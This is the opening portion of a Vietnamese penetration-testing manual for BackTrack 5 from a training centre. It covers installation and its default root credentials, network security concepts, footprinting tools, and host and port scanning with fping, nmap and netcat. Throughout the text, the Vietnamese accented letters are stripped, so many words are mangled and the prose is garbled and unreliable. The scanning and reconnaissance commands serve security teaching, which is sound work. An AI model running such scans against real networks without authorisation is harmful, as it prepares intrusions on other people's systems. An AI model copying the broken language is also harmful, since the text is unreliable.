You are on page 1of 106

TI LIU HNG DN V S DNG BACKTRACK 5 KHAI THC L HNG MNG TI TRUNG TM ATHENA

LI M U
u tin, xin gi li cm n chn thnh n thy V Thng Gim c Trung tm o to v qun tr mng an ninh mng Athena v thy L nh Nhn nhit tnh gip hon thnh ti liu ny. Cho gi li cm n n cc anh ch nhn vin t vn nhn vin h tr k thut ti Trung tm o to v qun tr mng Athena h tr v to iu kin hon thnh d n an nin mng ng thi hn c giao. Trn trng! Nhm thc hin Nguyn Sn Kh Tn Pht Nguyn Cao Thng

MC LC
Chng M u : GII THIU V BACKTRACK 5 ..................................... 6 I. II. Gii thiu ................................................................................................. 6 Mc ch .................................................................................................. 6

III. Ngun ti Backtrack : .............................................................................. 7 IV. Ci t ...................................................................................................... 8 1. 2. Live DVD ............................................................................................. 8 Install .................................................................................................... 8 Gii thiu ............................................................................................... 16 Vn bo mt h thng v mng......................................................... 16 1. 2. 3. Cc vn d chung v bo mt h thng v mng ............................... 16 Mt s khi nim v lch s bo mt h thng ................................... 16 Cc loi l hng bo mt v phng thc tn cng mng ch yu ... 17 Gii thiu v Footprinting ..................................................................... 21 Cc bc thc hin Footprinting ........................................................... 21 1. 2. 3. 4. 5. Xc nh vng hot ng ca chng ta .............................................. 21 Cc thng tin c sn cng khai ........................................................... 21 Whois v DNS Enumeration .............................................................. 21 Thm d DNS ..................................................................................... 22 Thm d mng .................................................................................... 22

Chng 1: TM HIU VN BO MT MNG LAN ............................ 16 I. II.

Chng 2: FOOTPRINTING........................................................................... 21 I. II.

III. Phng php thc hin Footprinting ..................................................... 22 IV. Cc cng c thc hin Footprinting: ..................................................... 25 1. 2. 3. 4. Sam Spade .......................................................................................... 25 Super Email Spider ............................................................................. 26 VitualRoute Trace .............................................................................. 27 Maltego ............................................................................................... 27

Chng 3: SCANNING ................................................................................... 28 3

I. II. 1. 2. 3.

Gii thiu ............................................................................................... 28 Chng nng ............................................................................................ 28 Xc nh h thng c ang hot ng hay khng? ............................ 28 Xc nh cc dch v ang chy hoc ang lng nghe. ...................... 31 Xc nh h iu hnh ........................................................................ 37

Chng 4: ENUMERATION .......................................................................... 39 I. II. Enumeration l g? ................................................................................. 39 Banner Grabbing .................................................................................... 39

III. Enumerating cc dch v mng.............................................................. 39 1. 2. 3. Http fingerprinting .............................................................................. 39 DNS Enumeration .............................................................................. 42 Netbios name ...................................................................................... 44 Gii Thiu .............................................................................................. 45 Cc K Thut Password Cracking ......................................................... 45 1. 2. 3. Dictionary Attacks/Hybrid Attacks .................................................... 45 Brute Forcing Attacks ........................................................................ 45 Syllable Attacks/Pre-Computed Hashes ............................................. 45

Chng 5: PASSWORD CRACKING ............................................................ 45 I. II.

III. Cc Kiu Tn Cng Thng Gp .......................................................... 45 1. 2. 3. Active Password Cracking ................................................................. 45 Passive Password Cracking ................................................................ 46 Offline Password Cracking ................................................................ 46

IV. Cc cng c Password Cracking............................................................ 46 1. 2. V. 1. 2. 3. 4. Hydra .................................................................................................. 46 Medusa ............................................................................................... 48 Password Cracking Trn Cc Giao Thc .............................................. 51 HTTP (HyperText Tranfer Protocol) ................................................. 51 SSH (Secure Shell) ............................................................................. 58 SMB (Server Message Block) ............................................................ 61 RDP (Remote Desktop Protocol) ....................................................... 64 4

Chng 6: SYSTEM HACKING .................................................................... 67 I. 1. 2. 3. 4. 5. II. 1. 2. 3. GII THIU V METASPLOIT .......................................................... 67 Gii thiu ............................................................................................ 67 Cc thnh phn ca Metasploit .......................................................... 67 S dng Metasploit Framework ......................................................... 67 Gii thiu Payload Meterpreter .......................................................... 68 Cch phng chng .............................................................................. 70 Li MS10-046 (2286198) ...................................................................... 70 Gii thiu ............................................................................................ 70 Cc bc tn cng: ............................................................................. 71 Cch phng chng .............................................................................. 79 Gii thiu ............................................................................................ 80 Cc bc tn cng .............................................................................. 80 Cch phng chng .............................................................................. 85 Gii thiu ............................................................................................... 86 Hng dn ci t DVWA trn Backtrack ............................................ 86 1. 2. Ti v ci t XAMPP........................................................................ 86 Ti v ci t DVWA ......................................................................... 88

III. Li BYPASSUAC ................................................................................. 80 1. 2. 3.

Chng 7: WEB HACKING VI DVWA ...................................................... 86 I. II.

III. Cc k thut tn cng trn DVWA ......................................................... 92 1. 2. XSS (Cross-Site Scripting) ................................................................. 92 SQL Injection ...................................................................................100

TI LIU THAM KHO ................................................................................106

Chng M u : GII THIU V BACKTRACK 5


I. Gii thiu

Backtrack l mt bn phn phi dng Live DVD ca Linux, c pht trin th nghim thm nhp. Trong cc nh dng Live DVD, chng ta s dng c th Backtrack trc tip t a DVD m khng cn ci n vo my ca chng ta. Backtrack cng c th c ci t vo cng v s dng nh mt h iu hnh. Backtrack l s hp nht gia 3 bn phn phi khc nhau ca Linux v thm nhp th nghim IWHAX, WHOPPIX, v Auditor. Trong phin bn hin ti ca n (5), Backtrack c da trn phin bn phn phi Linux Ubuntu 11.10. Tnh n ngy 19 thng by nm 2010, Backtrack 5 c ti v ca hn 1,5 triu ngi s dng. Phin bn mi nht l Backtrack 5 R2 Mc ch Cng c Backtrack c lch s pht trin kh lu qua nhiu bn linux khc nhau. Phin bn hin nay s dng bn phn phi Slackware linux (Tomas M. (www.slax.org)). Backtrack lin tc cp nht cc cng c, drivers,... hin ti Backtrack c trn 300 cng c phc v cho vic nghin cu bo mt. Backtrack l s kt hp gia 2 b cng c kim th bo mt rt ni ting l Whax v Auditor. II. Backtrack 5 cha mt s cng c c th c s dng trong qu trnh th nghim thm nhp ca chng ta. Cc cng c kim tra thm nhp trong Backtrack 5,0 c th c phn loi nh sau: Information gathering: loi ny c cha mt s cng c c th c s dng c c thng tin lin quan n mt mc tiu DNS, nh tuyn, a ch e-mail, trang web, my ch mail, v nh vy. Thng tin ny c thu thp t cc thng tin c sn trn Internet, m khng cn chm vo mi trng mc tiu. Network mapping: loi ny cha cc cng c c th c s dng kim tra cc host ang tn ti, thng tin v OS, ng dng c s dng bi mc tiu, v cng lm portscanning. Vulnerability identification: Trong th loi ny, chng ta c th tm thy cc cng c qut cc l hng (tng hp) v trong cc thit b Cisco. N cng cha cc cng c thc hin v phn tch Server Message Block (SMB) v Simple Network Management Protocol (SNMP). Web application analysis: loi ny cha cc cng c c th c s dng trong theo di, gim st cc ng dng web 6

Radio network analysis: kim tra mng khng dy, bluetooth v nhn dng tn s v tuyn (RFID), chng ta c th s dng cc cng c trong th loi ny. Penetration: loi ny cha cc cng c c th c s dng khai thc cc l hng tm thy trong cc my tnh mc tiu Privilege escalation: Sau khi khai thc cc l hng v c truy cp vo cc my tnh mc tiu, chng ta c th s dng cc cng c trong loi ny nng cao c quyn ca chng ta cho cc c quyn cao nht. Maintaining access: Cng c trong loi ny s c th gip chng ta trong vic duy tr quyn truy cp vo cc my tnh mc tiu. Chng ta c th cn c c nhng c quyn cao nht trc khi cc chng ta c th ci t cng c duy tr quyn truy cp Voice Over IP (VOIP): phn tch VOIP chng ta c th s dng cc cng c trong th loi ny Digital forensics: Trong loi ny, chng ta c th tm thy mt s cng c c th c s dng lm phn tch k thut nh c c hnh nh a cng, cu trc cc tp tin, v phn tch hnh nh a cng. s dng cc cng c cung cp trong th loi ny, chng ta c th chn Start Backtrack Forensics trong trnh n khi ng. i khi s i hi chng ta phi gn kt ni b a cng v cc tp tin trao i trong ch ch c bo tn tnh ton vn. Reverse engineering: Th loi ny cha cc cng c c th c s dng g ri chng trnh mt hoc tho ri mt tp tin thc thi. III. Ngun ti Backtrack :

Chng ta c th ti bn Backtrack 5 ti a ch: www.backtrack-linux.org/downloads/ C bn cho Vmware v file ISO

IV.

Ci t

1. Live DVD

Nu chng ta mun s dng Backtrack m khng cn ci n vo cng, chng ta c th ghi tp tin nh ISO vo a DVD, v khi ng my tnh ca chng ta vi DVD. Backtrack sau s chy t a DVD. Li th ca vic s dng Backtrack l mt DVD Live l n l rt d dng lm v chng ta khng cn phi gy ri vi cu hnh my hin ti ca chng ta. Tuy nhin, phng php ny cng c mt s nhc im. Backtrack c th khng lm vic vi phn cng, v thay i cu hnh no c thc hin trn phn cng lm vic s khng c lu vi a DVD Live. Ngoi ra, n l chm, v my tnh cn phi ti cc chng trnh t a DVD.
2. Install
a) Ci t trong my tht:

Chng ta cn chun b mt phn vng ci t Backtrack. Sau chy Backtrack Live DVD. Khi gp mn hnh login Ta s dng username l root, pass l toor. Sau vo ch ha, ta g startx v ta s vo ch ha ca Backtrack 5. ci t Backtrack 5 n a cng ta chn tp tin c tn install.sh trn desktop v tin hnh ci t. Tuy nhin, nu khng th tm thy tp tin, chng ta c th s dng ubiquity ci t. s dng ubiquity, ta m Terminal g ubiquity. 8

Sau ca s ci t s hin th. Sau tr li 1 s cu hi nh thnh ph chng ta ang sng, keyboard layout, phn vng a ci t, Sau tin hnh ci t.
b) Ci t trong my o:

im thun li l ta khng cn chun b mt phn vng cho Backtrack, v s dng ng thi mt OS khc. Khuyt im l tc chm, khng dng c wireless tr USB wireless. Ta c th c th s dng file VMWare c cung cp bi BackTrack. T y chng ta c BackTrack trn my o tht d dng v nhanh chng. Cu hnh trong file VMWare l memory 768MB, hardisk :30GB, Network:NAT. s dng c card mng tht, ta phi chn Netword l Briged Di y lm mt s hnh nh khi ci BackTrack trn my o VMWare

To mt my o mi v cho ia BackTrack vo.

Giao din khi ng ca BackTrack

10

G startx vo ch ha trong BackTrack

ci t, click chn vo file Install BackTrack trn mn hnh Desktop

11

Chn ngn ng, chn Forward tip tc

Chn ni ca chng ta, chn Forward tip tc 12

Chn ngn ng bn phm, chn Forward tip tc

Chn phn vng ci.

13

Nhn Install bt u ci

Qu trnh ci bt u.

14

Sau khi hon tt, ch vic khi ng li l xong.

15

Chng 1:
I.

TM HIU VN BO MT MNG LAN

Gii thiu An ninh an ton mng my tnh hon ton l vn con ngi, do vic a ra mthnh lang php l v cc quy nguyn tc lm vic c th l cn thit. y, hnhlang php l c th gm: cc iu khon trong b lut ca nh nc, cc vn bndi lut,... Cn cc quy nh c th do tng t chc t ra cho ph hp vi tngc im ring. Cc quy nh c th nh: quy nh v nhn s, vic s dng my,s dng phn mm,... V nh vy, s hiu qu nht trong vic m bo an ninh anton cho h thng mng my tnh mt khi ta thc hin trit gii php v chnhsch con ngi.Tm li, vn an ninh an ton mng my tnh l mt vn ln, n yucu cn phi c mt gii php tng th, khng ch phn mm, phn cng my tnhm n i hi c vn chnh sch v con ngi. V vn ny cn phi cthc hin mt cch thng xuyn lin tc, khng bao gi trit c v n lunny sinh theo thi gian. Tuy nhin, bng cc gii php tng th hp l, c bit lgii quyt tt vn chnh sch v con ngi ta c th to ra cho mnh s an tonchc chn hn. II. Vn bo mt h thng v mng

1. Cc vn d chung v bo mt h thng v mng

c im chung ca mt h thng mng l c nhiu ngi s dng chung v phn tn v mt a l nn vic bo v ti nguyn (mt mt hoc s dng khng hp l) phc tp hn nhiu so vi vic mi trng mt my tnh n l, hoc mtngi s dng.Hot ng ca ngi qun tr h thng mng phi m bo cc thng tin trnmng l tin cy v s dng ng mc ch, i tng ng thi m bo mng hotng n nh khng b tn cng bi nhng k ph hoi. Nhng trn thc t l khng mt mng no m bo l an ton tuyt i, mth thng d c bo v chc chn n mc no th cng c lc b v hiu ha binhng k c xu.
2. Mt s khi nim v lch s bo mt h thng
a) i tng tn cng mng (intruder)

i tng l nhng c nhn hoc t chc s dng nhng kin thc v mngv cc cng c ph hoi (gm phn cng hoc phn mm) d tm cc im yuv cc l hng bo mt trn h thng, thc hin cc hot ng xm nhp v chimot ti nguyn tri php.Mt s i tng tn cng mng nh:Hacker: l nhng k xm nhp vo mng tri php bng cch s dng cccng c ph mt khu hoc khai thc cc im yu ca thnh phn truy nhp trn hthngMasquerader : L nhng 16

k gi mo thng tin trn mng nh gi mo a chIP, tn min, nh danh ngi dngEavesdropping: L nhng i tng nghe trm thng tin trn mng, s dngcc cng c Sniffer, sau dng cc cng c phn tch v debug ly c ccthng tin c gi tr. Nhng i tng tn cng mng c th nhm nhiu mc ch khc nhau nhn cp cc thng tin c gi tr v kinh t, ph hoi h thng mng c ch nh, hocc th l nhng hnh ng v thc
b) Cc l hng bo mt

Cc l hng bo mt l nhng im yu trn h thng hoc n cha trongmt dch v m da vo k tn cng c th xm nhp tri php vo h thng thc hin nhng hnh ng ph hoi chim ot ti nguyn bt hp php.C nhiu nguyn nhn gy ra nhng l hng bo mt: c th do li ca bnthn h thng, hoc phn mm cung cp hoc ngi qun tr yu km khng hiusu v cc dch v cung cpMc nh hng ca cc l hng ti h thng l khc nhau. C l hngch nh hng ti cht lng dch v cung cp, c l hng nh hng ti ton b hthng hoc ph hy h thng
c) Chnh sch bo mt

Chnh sch bo mt l tp hp cc quy tc p dng cho nhng ngi thamgia qun tr mng, c s dng cc ti nguyn v cc dch v mng. i vi tng trng hp phi c chnh sch bo mt khc nhau. Chnh sch bo mt gip ngi s dng bit trch nhim ca mnh trong vic bo v cc tinguyn trn mng, ng thi cn gip cho nh qun tr mng thit lp cc bin phpm bo hu hiu trong qu trnh trang b, cu hnh v kim sot hot ng ca hthng v mng.
3. Cc loi l hng bo mt v phng thc tn cng mng ch yu
a) Cc loi l hng

C nhiu cc t chc tin hnh phn loi cc dng l hng c bit. Theo b quc phng M cc loi l hng c phn lm ba loi nh sau: L hng loi C Cho php thc hin cc hnh thc tn cng theo DoS(Denial of Services- T chi dch v) Mc nguy him thp ch nh hng ticht lng dch v, lm ngng tr, gin on h thng, khng lm ph hng d liuhoc t c quyn truy cp bt hp php.DoS l hnh thc tn cng s dng cc giao thc tng Internet trong bgiao thc TCP/IP lm h thng ngng tr dn n tnh trng t chi ngi sdng hp php truy nhp hay s dng h thng.Cc dch v c l hng cho php cc cuc tn cng DoS c th c nngcp hoc sa cha bng cc phin bn mi hn ca cc nh 17

cung cp dch v. Hinnay cha c mt bin php hu hiu no khc phc tnh trng tn cng kiu nyv bn thn thit k tng Internet (IP) ni ring v b giao thc TCP/IP ni chung n cha nhng nguy c tim tang ca cc l hng loi ny. L hng loi B: Cho php ngi s dng c thm cc quyn trn h thng m khng cn kim tra tnh hp l dn n mt mt thng tin yu cu cn bo mt.L hng ny thng c trong cc ng dng trn h thng . C mc nguy him l trung bnh.L hng loi B ny c mc nguy him hn l hng loi C. Cho phpngi s dng ni b c th chim c quyn cao hn hoc truy nhpkhnghp php. Nhng l hng loi ny thng xut hin trong cc dch v trn h thng. Ng s dng local c hiu l ngi c quyn truy nhp vo h thng vimt s quyn hn nht nh. Tm hiu vn bo mt mng LAN. Mt dng khc ca l hng loi B xy ra vi cc chng trnh vit bng m ngun C. Nhng chng trnh vit bng m ngun C thng s dng mt vngm, mt vng trong b nh s dng lu tr d liu trc khi x l. Ngi lptrnh thng s dng vng m trong b nh trc khi gn mt khong khng gian b nh cho tng khi d liu. V d khi vit chng trnh nhp trng tn ngi sdng quy nh trng ny di 20 k t bng khai bo:Char first_name [20]; Khai bo ny cho php ngi s dng nhp ti a 20k t. Khi nhp d liu ban u d liu c lu vng m. Khi ngi s dngnhp nhiu hn 20 k t s trn vng m. Nhng k t nhp tha s nm ngoivng m khin ta khng th kim sot c. Nhng i vi nhng k tn cngchng c th li dng nhng l hng ny nhp vo nhng k t c bit thcthi mt s lnh c bit trn h thng. Thng thng nhng l hng ny c lidng bi nhng ngi s dng trn h thng t c quyn root khng hp l. hn ch c cc l hng loi B phi kim sot cht ch cu hnh h thng vcc chng trnh. L hng loi A Cho php ngi ngoi h thng c th truy cp bt hp phpvo h thng. C th lm ph hu ton b h thng. Loi l hng ny c mc rtnguy him e da tnh ton vn v bo mt ca h thng. Cc l hng ny thngxut hin nhng h thng qun tr yu km hoc khng kim sot c cu hnhmng. Nhng l hng loi ny ht sc nguy him v n tn ti sn c trn phnmm s dng, ngi qun tr nu khng hiu su v dch v v phn mm s dngc th b qua im yu ny. V vy thng xuyn phi kim tra cc thng bo cacc nhm tin v bo mt trn mng pht hin nhng l hng loi ny. Mt lotcc chng trnh phin bn c thng s dng c nhng l hng loi A nh: FTP,Gopher, Telnet, Sendmail, ARP, finger. 18

b) Cc hnh thc tn cng mng ph bin

Scanner Scanner l mt chng trnh t ng r sot v pht hin nhng im yu v bo mt trn mt trm lm vic cc b hoc mt trm xa. Mt k ph hoi s dng chng trnh Scanner c th pht hin ra nhng l hng v bo mt trn mtServer d xa.C ch hot ng l r sot v pht hin nhng cng TCP/UDP c s dng trn h thng cn tn cng v cc dch v s dng trn h thng . Scanner ghi li nhng p ng trn h thng t xa tng ng vi dch v m n pht hinra. T n c th tm ra im yu ca h thng. Nhng yu t mt Scanner hot ng nh sau:Yu cu thit b v h thng: Mi trng c h tr TCP/IPH thng phi kt ni vo mng Internet.Cc chng trnh Scanner c vai tr quan trng trong mt h thng bo mt,v chng c kh nng pht hin ra nhng im yu km trn mt h thng mng. Password Cracker L mt chng trnh c kh nng gii m mt mt khu c m hohoc c th v hiu ho chc nng bo v mt khu ca mt h thng.Mt s chng trnh ph kho c nguyn tc hot ng khc nhau. Mt schng trnh to ra danh sch cc t gii hn, p dng mt s thut ton m ho t kt qu so snh vi Password m ho cn b kho to ra mt danh sch khctheo mt logic ca chng trnh.Khi thy ph hp vi mt khu m ho, k ph hoi c c mt khudi dng text . Mt khu text thng thng s c ghi vo mt file.Bin php khc phc i vi cch thc ph hoi ny l cn xy dng mtchnh sch bo v mt khu ng n. Sniffer Sniffer l cc cng c (phn cng hoc phn mm)bt cc thng tin luchuyn trn mng v ly cc thng tin c gi tr trao i trn mng.Sniffer c th bt c cc thng tin trao i gia nhiu trm lm vic vinhau. Thc hin bt cc gi tin t tng IP tr xung. Giao thc tng IP c nhngha cng khai, v cu trc cc trng header r rng, nn vic gii m cc gi tin ny khng kh khn. Mc ch ca cc chng trnh sniffer l thit lp ch promiscuous(mode dng chung) trn cc card mng ethernet - ni cc gi tin trao i trongmng - t "bt" c thng tin.Cc thit b sniffer c th bt c ton b thng tin trao i trn mng lda vo nguyn tc broadcast (qung b) cc gi tin trong mng Ethernet.Tuy nhin vic thit lp mt h thng sniffer khng phi n gin v cn phi xm nhp c vo h thng mng v ci t cc phn mm sniffer.ng thi cc chng trnh sniffer cng yu cu ngi s dng phi hiusu v kin trc, cc giao thc mng.Vic pht hin h thng b sniffer khng phi n gin, v sniffer hot ng tng rt thp, v khng nh hng ti cc ng dng cng nh cc dch v hthng 19

cung cp.Tuy nhin vic xy dng cc bin php hn ch sniffer cng khng qu khkhn nu ta tun th cc nguyn tc v bo mt nh: Khng cho ngi l truy nhp vo cc thit b trn h thng Qun l cu hnh h thng cht ch Thit lp cc kt ni c tnh bo mt cao thng qua cc c ch m ho. Trojans Trojans l mt chng trnh chy khng hp l trn mt h thng. Vi vaitr nh mt chng trnh hp php. Trojans ny c th chy c l do cc chngtrnh hp php b thay i m ca n thnh m bt hp php.V d nh cc chng trnh virus l loi in hnh ca Trojans. Nhngchng trnh virus thng che du cc on m trong cc chng trnh s dng hp php. Khi nhng chng trnh ny c kch hot th nhng on m n du sthc thi v chng thc hin mt s chc nng m ngi s dng khng bit nh: ncp mt khu hoc copy file m ngi s dng nh ta thng khng hay bit.Mt chng trnh Trojans s thc hin mt trong nhng cng vic sau: Thc hin mt vi chc nng hoc gip ngi lp trnh ln n pht hinnhng thng tin quan trng hoc nhng thng tin c nhn trn mt h thng hocch trn mt vi thnh phn ca h thng . Che du mt vi chc nng hoc l gip ngi lp trnh pht hin nhngthng tin quan trng hoc nhng thng tin c nhn trn mt h thng hoc ch trnmt vi thnh phn ca h thng. Ngoi ra cn c cc chng trnh Trojan c th thc hin c c hai chc nngny. C chng trnh Trojan cn c th ph hy h thng bng cch ph hoi ccthng tin trn cng. Nhng ngy nay cc Trojans kiu ny d dng b pht hin vkh pht huy c tc dng.Tuy nhin c nhng trng hp nghim trng hn nhng k tn cng to ranhng l hng bo mt thng qua Trojans v k tn cng ly c quyn root trnh thng v li dng quyn ph hy mt phn hoc ton b h thng hocdng quyn root thay i logfile, ci t cc chng trnh trojans khc m ngiqun tr khng th pht hin c gy ra mc nh hng rt nghim trng vngi qun tr ch cn cch ci t li ton b h thng.

20

Chng 2:
I.

FOOTPRINTING

Gii thiu v Footprinting L mt k thut tm kim thng tin v mt danh nghip, c nhn hay t chc. Mt trong 3 giai on cn phi lm thc hin mt cuc tn cng. Mt k tn cng dnh 90% thc hin vic thu thp v tim kim thng tin v 10% thc hin tn cng. Kt qu ca qu trnh Footprinting l ly c thng tin c bn ca mc tiu tn cng: Tn, a ch cng ty, website, cc thnh vin trong cng ty, s mng, Cc thng tin cn tm kim: Internet: Domain, Network blocks, IP, TCP hay UDP, System Enumeration, ACLs, IDSes, Intranet Remote access: Remote system type, Extranet: Connection origination and destination, Cc bc thc hin Footprinting Bao gm cc bc sau:

II.

1. Xc nh vng hot ng ca chng ta

Th u tin trong kinh doanh l xc nh vng hot ng ca cc hot ng footprinting ca chng ta. N c th l mt nhim v nn lng xc nh tt c cc thc th trong mt t chc no . Tuy nhin, hacker chng thng cm cho cuc chin ca chng ta. H khai thc cc im yu trong bt c cc biu mu no. Chng ta khng mun hacker bit nhiu v tnh trng bo mt ca chng ta.
2. Cc thng tin c sn cng khai

Lng thng tin m n sn sng sn c cho chng ta, t chc chng ta v bt c nhng g chng ta c th hnh dung th chng l g thiu tnh tuyt vi. Nhng thng tin c th bao gm: trang web ca cng ty; cc t chc quan h; v tr ta lc; thng tin chi tit v nhn vin; cc s kin hin ti; cc chnh sch bo mt v s ring t.
3. Whois v DNS Enumeration

Xem chi tit thng tin v a ch IP, name server, dns server

21

4. Thm d DNS

Sau khi xc nh tt c cc domain c lin quan, chng ta bt u truy vn DNS. DNS l mt c s d liu phn tn dng nh x cc a ch IP thnh hostname. Nu DNS khng c cu hnh mt cch bo mt, rt c kh nng ly c cc thng tin bi l t t chc.
5. Thm d mng

By gi th chng ta xc nh c cc mng tim nng, chng ta c th xc nh m hnh mng cng nh ng truy cp c kh nng vo mng

III.

Phng php thc hin Footprinting C 2 phng php thc Footprinting: Active Footprinting: lin h trc tip vi mc tiu, tm hiu thng tin cn thit Passive Footprinting: Tm kim thng qua cc bi bo, trang web, hoc t cc i th mc tiu, Website: www.google.com http://whois.domaintools.comwww.whois.net , www.arcchive.org , , ,

www.tenmien.vn

22

Whois : athena.com.vn

23

Tenmien.vn

24

Archive: http://www.microsoft.com

Cc cng c thc hin Footprinting: Sam Spade, Super email spider, VitualRoute Trace, Google Earth, Whois, Site Digger, Maltego, IV.
1. Sam Spade

Cho php ngi s dng c th thc hin cc hnh ng: Ping, Nslookup, Whois, Traceroute, 25

2. Super Email Spider

Tm kim thng tin v a ch email ca c quan t chc s dng Search Engine: Google, Lycos, iWon, Exiter, Hotbot, MSN, AOL,

26

3. VitualRoute Trace

Hin th cc ng ni kt, a ch, khu vc ng kt ni i qua.

4. Maltego

L cng c dng pht hin cc lin kt gia: Ngi s dng, c quan, t chc, website, domain, di mng, a ch IP,

27

Chng 3:
I.

SCANNING

Gii thiu Nu footprinting l vic xc nh ngun thng tin ang u th scanning l vic tm ra tt c cc cnh ca xm nhp vo ngun thng tin . Trong qu trnh footprinting, chng ta t c danh sch dy mng IP v a ch IP thng qua nhiu k thut khc nhau bao gm whois v truy vn ARIN. K thut ny cung cp cho nh qun tr bo mt cng nh hacker nhiu thng tin co gi tr v mng ch, dy IP, DNS servers v mail servers. Trong chng ny, chng ta s xc nh xem h thng no ang lng nghe trn giao thng mng v c th bt c qua vic s dng nhiu cng c v k thut nh ping sweeps, port scan. Chng ta c th d dng vt tng la bng tay (bypass firewalls) scan cc h thng gi s nh n ang b kha bi chnh sch trch lc (filtering rules). II. Chng nng

1. Xc nh h thng c ang hot ng hay khng?

Mt trong nhng bc c bn lp ra mt mng no l ping sweep trn mt dy mng v IP xc nh cc thit b hoc h thng c ang hot ng hay khng. Ping thng c dng gi cc gi tin ICMP ECHO ti h thng ch v c gng nhn c mt ICMP ECHO REPLY bit h thng ang hot ng. Ping c th c chp nhn xc nh s lng h thng cn sng c trong mng trong mng va v nh ( Lp C c 254 v B c 65534 a ch) v chng ta c th mt hng gi, hng ngy hon thnh cho nhnh mng lp A 16277214 a ch.
a) Netword Ping Sweeps

Netword pinging l hnh ng gi cc loi ca giao thng mng ti ch v phn tch kt qu. Pinging s dng ICMP (Internet Control Message Protocol). Ngoi ra, n cn s dng TCP hoc UDP tm host cn sng. thc hin ICMP ping sweep, ta c th s dng fping, nmap,. Fping a g 192.168.10.1 192.168.10.10 -a hin thi host ang sng: alive -g dy a ch: 192.168.10.0/24 or nh trn

28

Nmap sP PE 192.168.10.0/24 -sP: ping scan -PE: ping echo

29

Phng chng: chng ta c th dng pingd gi tt c cc giao thng mng ICMP ECHO v ICMP ECHO REPLY cp host. im ny t c bng cch g b s h tr ca vic x l ICMP ECHO t nhn h thng. V mt c bn, n cung cp mt c ch iu khin truy cp mc h thng.
b) ICMP query

Ping sweeps (or ICMP ECHO packets) c th ni ch l nh u ca tng bng khi ni n thng tin ICMP v mt h thng. chng ta c th thu thp nhiu loi thng tin c gi tr n gin bng cch cc gi tin ICMP. Chng ta c th yu cu mt n mng ca mt thit b no vi Address Mask Request. Mt n mng rt quan trng v chng ta c th xc nh c tt c a ch ca ch, bit c gatewate mt nh, a ch broadcast. Nh vo gateway mc nh, chng ta c th tn cng router. Vi a ch broadcast. Nhng khng phi tt c cc router no cng h tr Time v Netmask. Phng chng: Kha loi ICMP m cung cp thng tin ti router bin (router i ra ISP). gim ti mc thiu, chng ta nn dng access list (ACLs): o Access-list 101 deny icmp any any 13 // yu cu timestamp o Access-list 101 deny icmp any any 17 // yu cu address mask 30

2. Xc nh cc dch v ang chy hoc ang lng nghe.


a) Port Scanning

Port scanning l qu trnh gi cc gi tin ti cng TCP v UDP trn h thng ch xc nh dch v no ang chy hoc trong tnh trng ang lng nghe. Vic xc nh ang lng nghe l rt quan trng xc nh cc dch v ang chy. Thm vo , chng ta c th xc nh loi v phin bn h iu hnh ang chy v ng dng ang x dng.
b) Cc Loi Scan

Trc khi thc hin port scanning, chng ta nn im qua mt s cch thc qut sn c: TCP Connect scan: loi ny kt ni ti cng ch v thc hin y quy trnh bt tay ba bc (SYN, SYN/ACK, ACK). Tuy nhin iu ny th d dng b pht hin bi h thng ch. N s dng li gi h thng thay cho cc gi tin sng (raw packets) v thng c s dng bi nhng ngi dng Unix khng c quyn.V SYN Scan khng th thc hin c. TCP SYN scan: n khng to ra mt kt ni ti ngun m ch gi gi tin SYN(bc u tin trong ba bc to kt ni) ti ch. Nu a gi tin SYN/ACK c tr v th chng ta bit c cng ang lng nghe. Ngc li, nu nhn c RST/ACK th cng khng lng nghe. K thut ny kh b pht hin hn l TCP connect v n khng lu li 31

thng tin my tnh ch. Tuy nhin, mt trong nhng nhc im ca k thut ny l c th to ra iu kin t chi dch v DoS nu c qu nhiu kt ni khng y c to ra. V vy, k thut ny l an ton nu khng c qu nhiu kt ni nh trn c to ra. TCP ACK Scan: k thut ny c dng vch ra cc quy tt thit lp tng la. n c th gip xc nh xem tng la l trnh trch lc cc gi tin n gin cho php to kt ni hay l trnh trch lc nng cao. Tuy nhin n khng th phn bit c cng no open hay closed. TCP Windows Scan: Ging vi ACK Scan, im khc l n c th pht hin cng open vi closed. UDP Scan: k thut ny gi mt gi tin UDP ti cng ch. Nu cng ch tr li vi thng ip ICMP port unreachable th cng closed. Nu khng nhn c thng ip trn th cng trn ang m. Tuy nhin, UDP scan l mt qu trnh rt chp nu nh chng ta c gng scan mt thit b no m c p chnh sch trch lc gi tin mnh. TCP FIN, XMAS, NULL: chng chuyn nghip trong vic ln lt vt tng la khm ph cc h thng pha sau. Tuy nhin, chng li ph thuc nhiu vo cch x l ca h thng ch m(in hnh l Windows) th khng c biu hin g. Strobe: c tin cy cao, tuy nhin ch h tr TCP, khng h tr UDP

c) Xc nh cc dch v TCP v UDP ang chy

32

Netcat l mt tin ch mng Unix n gin tnh nng c v ghi d liu qua kt ni mng, s dng giao thc TCP / IP.N c thit k nh l mt cng c ng tin cy "back-end" c th c s dng trc tip hoc d dng iu khin bi cc chng trnh v cc script khc. ng thi, n l cng c g li mng vi nhiu tnh nng v cng c thm d. Nc v z w2 192.168.10.102 1-4000 -v: xut chi tit ra mn hnh -z: zero-I/O mode khng gi d liu no ch pht ra mt gi tin. 192.168.10.102: host 1-4000: port cn qut.

Nmap (Network Mapper) l mt tin ch ngun m min ph cho pht hin mng v kim ton an ninh. Nhiu qun tr mng v h thng cng tm thy s hu ch cho cc cng vic nh kim k mng li, dch v qun l lch trnh, v theo di thi gian hot ng dch v v my ch. Nmap s dng cc gi tin IP th trong cc phng php mi xc nh host no c sn trn mng, cc dch v (tn ng dng v phin bn) m host ang cung cp, h iu hnh g (v cc phin bn h iu hnh) m h ang chy, loi b lc gi tin hoc tng la no ang s dng, v nhiu c im khc. N c thit k scan nhanh chng cc mng 33

ln, nhng ho. Nmap chy c trn tt c cc h iu hnh, v cc gi nh phn chnh thc c sn cho Linux, Windows, v Mac OS X. Cch dng n gin nht, khng c t tham s: nmap 192.168.10.0/24

Qu trnh c thc hin nh sau: 34

